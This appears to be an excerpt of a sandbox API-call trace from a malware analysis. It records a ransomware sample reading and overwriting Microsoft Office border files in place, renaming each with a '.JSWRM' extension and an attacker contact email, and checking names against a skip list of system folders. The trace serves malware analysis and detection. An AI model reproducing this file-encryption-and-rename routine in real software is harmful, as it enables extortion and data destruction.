lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART5.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART5.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART5.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART5.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART5.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart5.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.164] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15788) returned 1 [0129.164] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.164] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3da0, lpOverlapped=0x0) returned 1 [0129.167] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.167] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3da0, lpOverlapped=0x0) returned 1 [0129.167] CloseHandle (hObject=0x238) returned 1 [0129.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart5.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART5.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart5.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.168] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1774e9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd7b6, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART6.BDR", cAlternateFileName="")) returned 1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2=".") returned 1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2="..") returned 1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2="...") returned 1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2="windows") returned -1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2="recovery") returned -1 [0129.168] lstrcmpiW (lpString1="MSART6.BDR", lpString2="perflogs") returned -1 [0129.169] lstrcmpiW (lpString1="MSART6.BDR", lpString2="documents and settings") returned 1 [0129.169] lstrcmpiW (lpString1="MSART6.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.169] lstrcmpiW (lpString1="MSART6.BDR", lpString2="system volume information") returned -1 [0129.169] lstrcmpiW (lpString1="MSART6.BDR", lpString2="msocache") returned -1 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART6.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART6.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART6.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART6.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART6.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART6.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart6.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.170] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55222) returned 1 [0129.170] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.170] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xd7b0, lpOverlapped=0x0) returned 1 [0129.175] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.175] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xd7b0, lpOverlapped=0x0) returned 1 [0129.175] CloseHandle (hObject=0x238) returned 1 [0129.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart6.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART6.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart6.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.178] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1774e9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf24, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART7.BDR", cAlternateFileName="")) returned 1 [0129.178] lstrcmpiW (lpString1="MSART7.BDR", lpString2=".") returned 1 [0129.178] lstrcmpiW (lpString1="MSART7.BDR", lpString2="..") returned 1 [0129.178] lstrcmpiW (lpString1="MSART7.BDR", lpString2="...") returned 1 [0129.178] lstrcmpiW (lpString1="MSART7.BDR", lpString2="windows") returned -1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="recovery") returned -1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="perflogs") returned -1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="documents and settings") returned 1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="system volume information") returned -1 [0129.179] lstrcmpiW (lpString1="MSART7.BDR", lpString2="msocache") returned -1 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART7.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART7.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART7.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART7.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART7.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART7.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart7.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.180] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3876) returned 1 [0129.180] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.180] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xf20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xf20, lpOverlapped=0x0) returned 1 [0129.181] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.181] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xf20, lpOverlapped=0x0) returned 1 [0129.181] CloseHandle (hObject=0x238) returned 1 [0129.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart7.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART7.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart7.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.183] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbfca, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART8.BDR", cAlternateFileName="")) returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2=".") returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="..") returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="...") returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="windows") returned -1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="recovery") returned -1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="perflogs") returned -1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="documents and settings") returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="system volume information") returned -1 [0129.183] lstrcmpiW (lpString1="MSART8.BDR", lpString2="msocache") returned -1 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART8.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART8.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART8.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART8.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART8.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART8.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart8.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.184] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49098) returned 1 [0129.184] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.184] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbfc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xbfc0, lpOverlapped=0x0) returned 1 [0129.189] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.189] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbfc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xbfc0, lpOverlapped=0x0) returned 1 [0129.189] CloseHandle (hObject=0x238) returned 1 [0129.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart8.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART8.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart8.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.190] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc696, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART9.BDR", cAlternateFileName="")) returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2=".") returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="..") returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="...") returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="windows") returned -1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="recovery") returned -1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="perflogs") returned -1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="documents and settings") returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="system volume information") returned -1 [0129.190] lstrcmpiW (lpString1="MSART9.BDR", lpString2="msocache") returned -1 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART9.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART9.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART9.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART9.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART9.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART9.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.191] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50838) returned 1 [0129.191] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.191] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc690, lpOverlapped=0x0) returned 1 [0129.195] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.195] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc690, lpOverlapped=0x0) returned 1 [0129.196] CloseHandle (hObject=0x238) returned 1 [0129.196] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart9.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART9.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart9.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.197] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc696, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART9.BDR", cAlternateFileName="")) returned 0 [0129.197] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0129.197] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cf4318, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf7e60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2=".") returned 1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="..") returned 1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="...") returned 1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="windows") returned -1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="recovery") returned -1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="perflogs") returned -1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="documents and settings") returned -1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="system volume information") returned -1 [0129.197] lstrcmpiW (lpString1="BSTORM.DLL", lpString2="msocache") returned -1 [0129.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM.DLL", lpUsedDefaultChar=0x0) returned 10 [0129.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM.DLL", lpUsedDefaultChar=0x0) returned 10 [0129.197] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834d1316, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0129.197] lstrcmpiW 